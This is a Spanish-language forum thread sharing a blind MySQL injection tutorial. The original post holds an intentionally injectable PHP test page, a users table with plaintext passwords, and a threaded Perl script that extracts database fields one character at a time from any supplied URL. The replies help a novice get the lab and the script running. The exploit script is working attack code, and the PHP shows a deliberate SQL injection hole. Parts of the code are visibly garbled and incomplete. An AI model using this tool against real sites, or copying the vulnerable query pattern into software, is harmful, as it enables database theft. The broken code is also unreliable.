Autor
|
Tema: Blind MySql Injection by Ka0x (Leído 12,287 veces)
|
Hendrix
|
Aqui dejo este papper que me paso ka0x para ser publicado aqui, esta bastante interesante http://www.milw0rm.com/papers/197Un Saludo Editado: Aqui dejo los codigos, para que no se tengan que copiar del PDF: Codigo php:<?php # ---- CONFIG ----- $host = 'localhost'; $dbuser = 'root'; $dbpass = 'password'; $dbname = 'blind'; # ----------------- echo "<title>Blind SQL Injection Test - D.O.M LABS 2008</title>"; $sql = "SELECT * FROM users WHERE id=".$_GET['id']; } echo "<h2><center><u>Blind SQL Injection Test<br>D.O.M LABS</u><br><br>"; echo "<font color='#FF0000'>user_id: </font>".$result[0]."<br>"; echo "<font color='#FF0000'>username: </font>".$result[1]."<br>"; // echo "Passwd: ".$result[2]."<br>"; echo "</h2></center>"; ?>
Código SQL:-- Table: users -- by ka0x - D.O.M -- Blind SQL Injection Paper CREATE TABLE `users` ( `id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT, `name` VARCHAR(50) NOT NULL, `password` VARCHAR(50) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ; -- users -- INSERT INTO `users` VALUES (1, 'administrator', '1234%&_'); INSERT INTO `users` VALUES (2, 'ka0x', 't3st_bl1nd'); INSERT INTO `users` VALUES (3, 'bush', 'terrorist'); -- eof --
Código Perl:#!/usr/bin/perl -W # Blind MySQL Injection Paper # example brute force # -- OPTIONS -- my $MAX_FIELD_LENGTH = 200 ; my $EXIT_IF_NO_CHAR = 1 ; my $DEFAULT_THREADS = 15 ; my $DEFAULT_THREADS_TIMEOUT = 30 ; my @ascii = ( 33 .. 123 ) ; my $DEFAULT_THREADS_TIME = 1 ; # --- use LWP::UserAgent ; sub _HELP_AND_EXIT { ./$0 -u <url> -tn <table> -cn <column> -p <pattern> Options: -u <url> Ex: http://www.google.es/vuln.php?id=1 -tn <table_name> Table name. -cn <column_name> Column name. -p <pattern> HTML pattern. Other: -t <#> Threads, default '$DEFAULT_THREADS'. -l <#> Maximum table name length '$MAX_FIELD_LENGTH'. -T <#> Timeout. -h Help (also with --help). " ; } my ($p, $w) = ({ @ARGV }, { }) ; &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ; die "[!] Require: $_\n" unless $p->{ $_ } ; } qw/-u -tn -cn -p/ ; $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ; $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ; $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ; warn "[i] Getting default: $_ $w->{ $_ }\n" ; ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ; sub _START_WORK { ($p->{'id_value'}) = ( $p->{'-u'} =~ /(\d+)$/ ) ; # Get the id value my $position = 1 ; autoflush STDOUT 1 ; my $sql_message = '' ; my $msg = '' ; my @pid ; while( $position <= $p->{'-l'} ) { my $cf ; unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; } my $count = 0 ; my $can_exit ; my $char_printed ; while(<R>) { my ($res, $pos, $ascii) = ( split(/ /, $_) ) ; $count++ if $pos == $position ; print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ; if( $res eq 'yes' and $pos == $position ){ $char_printed = $can_exit = 1 ; print Ws "STOP $position\n" ; $sql_message .= chr( $ascii ) ; } last if ( $can_exit or $count == @ascii ); } unless( $char_printed ) { if( $EXIT_IF_NO_CHAR ) { warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ; last ; } } $position++ ; } print "[i] SQL_FIELD:\n$sql_message\n" ; } sub _CHECKING { my ($p, $position) = @_ ; my $counter = 0 ; my $stop_position ; foreach my $ascii ( @ascii ) { $counter++ ; if( $counter % $p->{'-t'} == 0 ) { my $stop_position ; { $SIG{'ALRM'} = sub { die "non_stop\n" } ; alarm $DEFAULT_THREADS_TIME ; my $line = <Rs> ; $stop_position = (split( / /, $line))[1] ; } ; if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; } } { my $url = $p->{'-u'} . ' AND ascii(substring((SELECT ' . $p->{'-cn'} . ' FROM ' . $p->{'-tn'} . ' where id=' . $p->{'id_value'} . '),' . $position . ',1))='. $ascii ; my $ua = LWP::UserAgent->new ; $ua->timeout( $p->{'-T'} ) ; my $content ; while( 1 ) { last if $content = $ua->get( $url )->content ; } ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ; } } } sub _IS_VULN { my $ua = LWP::UserAgent->new ; $ua->timeout( $p->{'-T'} ) ; my ( $one, $two ) = ( $ua->get( $p->{'-u'}." AND 1=1")->content , $ua->get( $p->{'-u'}." AND 1=2")->content , ) ; return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ; }
|
|
« Última modificación: 26 Abril 2008, 16:50 pm por Hendriҳ »
|
En línea
|
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
|
|
|
Securitykill
Desconectado
Mensajes: 15
|
Precisamente ayer lei el paper y .. Esta muy bueno Saludos
|
|
|
En línea
|
|
|
|
pedrox@
Desconectado
Mensajes: 48
|
w0w! Lo leí y esta perfecto ademas metieron códigos de ejemplo Asi si que se entiende 100% Saludos.
|
|
|
En línea
|
|
|
|
Dynamique
Desconectado
Mensajes: 401
|
Muy bonito Y fácil de entender , haber si postean más así ^^
|
|
|
En línea
|
<?php echo "Hello, I am Dynamique"; ?>
|
|
|
GiRLaZo
Desconectado
Mensajes: 28
Llamarme GiR
|
Saludos.
Tengo un problema y es que cuando he subido la base de datos... y esta todo echo pero cuando lo cargo... es decir cuando abro el archivo php... me dice "No hay columnas". La verdad, no se donde esta el fallo, he echo bien lo del config, he subido el SQL posteado a mi base de datos y nada, me da ese error...
Atte: GiR
|
|
|
En línea
|
No abras los labios si no estás seguro de que lo que vas a decir es más hermoso que el silencio.
|
|
|
pedrox@
Desconectado
Mensajes: 48
|
Saludos.
Tengo un problema y es que cuando he subido la base de datos... y esta todo echo pero cuando lo cargo... es decir cuando abro el archivo php... me dice "No hay columnas". La verdad, no se donde esta el fallo, he echo bien lo del config, he subido el SQL posteado a mi base de datos y nada, me da ese error...
Atte: GiR
hombre lógico, si entras http://localhost/vulnerable.php no seleccionas ningun registro de la base de datos y el script muere diciendo que "No hay columnas": }
pero si haces: http://localhost/vulnerable.php?id=1Pues ya te saldra el usuario "administrator". Saludos.
|
|
« Última modificación: 27 Abril 2008, 22:40 pm por z1rr0s1s »
|
En línea
|
|
|
|
GiRLaZo
Desconectado
Mensajes: 28
Llamarme GiR
|
Saludos
Gracias, no me habia dado cuenta del enorme fallo pero ahora mi duda es que ejecuto el archivo perl... con cmd.exe
guardo el archivo como blind.pl voy a abrirlo con el CMD.exe y me abre un bloc de notas con el codigo =( ?? como hago para que se ejecute devidamente?
Atte:GiR
|
|
|
En línea
|
No abras los labios si no estás seguro de que lo que vas a decir es más hermoso que el silencio.
|
|
|
Azielito
no es
Colaborador
Desconectado
Mensajes: 9.188
>.<
|
lee los post pegados uqe para algo estan, busca de como abrir exploits y eso, tienes que intstalar perl y con cmd invocar a este con el nombre de archivo que quieres que interprete
sobre el tuto lo estoy leyendo, me estoy metiendo un poco en ese rollo, por cierto el amigo R41N-W4R3 me pasu un excelente manual, espero que lo pueda compartir con ustedes tambien
|
|
« Última modificación: 28 Abril 2008, 22:01 pm por Azielito »
|
En línea
|
|
|
|
GiRLaZo
Desconectado
Mensajes: 28
Llamarme GiR
|
Saludos
Gracias por vuestra paciencia por un newbie tan grande como yo ^^ espero que algun futuro os pueda ayudar en lo que sea...
Atte: GiR
PD: perdonar mi ignorancia
|
|
|
En línea
|
No abras los labios si no estás seguro de que lo que vas a decir es más hermoso que el silencio.
|
|
|
pedrox@
Desconectado
Mensajes: 48
|
Saludos
Gracias, no me habia dado cuenta del enorme fallo pero ahora mi duda es que ejecuto el archivo perl... con cmd.exe
guardo el archivo como blind.pl voy a abrirlo con el CMD.exe y me abre un bloc de notas con el codigo =( ?? como hago para que se ejecute devidamente?
Atte:GiR
Yo el script lo probe en WINDOWS y no rula, al parecer esta hecho para LINUX. Pruebalo en Linux, guardas el código como blind.pl, vas a la terminal, vas al directorio donde hayas dejado el script y lo ejecutas: # perl blind.pl <argumentos del script> ó # ./blind.pl <argumentos del script> Saludos.
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Problas con blind injection
Nivel Web
|
G0kuu_G0kuu
|
0
|
1,861
|
15 Julio 2011, 10:22 am
por G0kuu_G0kuu
|
|
|
Algun informacion sobre blind injection del tipo varchar
Nivel Web
|
kyr4-X-Force
|
3
|
3,884
|
6 Junio 2012, 09:46 am
por WarGhost
|
|
|
Confusión con blind SQL injection
Seguridad
|
Schaiden
|
3
|
3,575
|
27 Septiembre 2017, 06:13 am
por BloodSharp
|
|
|
Dudas en Blind SQL injection
Bugs y Exploits
|
onirico
|
1
|
2,279
|
24 Agosto 2018, 04:49 am
por onirico
|
|
|
PREGUNTA - SQL BLIND INJECTION
Hacking
|
tobiasasa
|
4
|
3,580
|
11 Abril 2020, 23:42 pm
por tobiasasa
|
|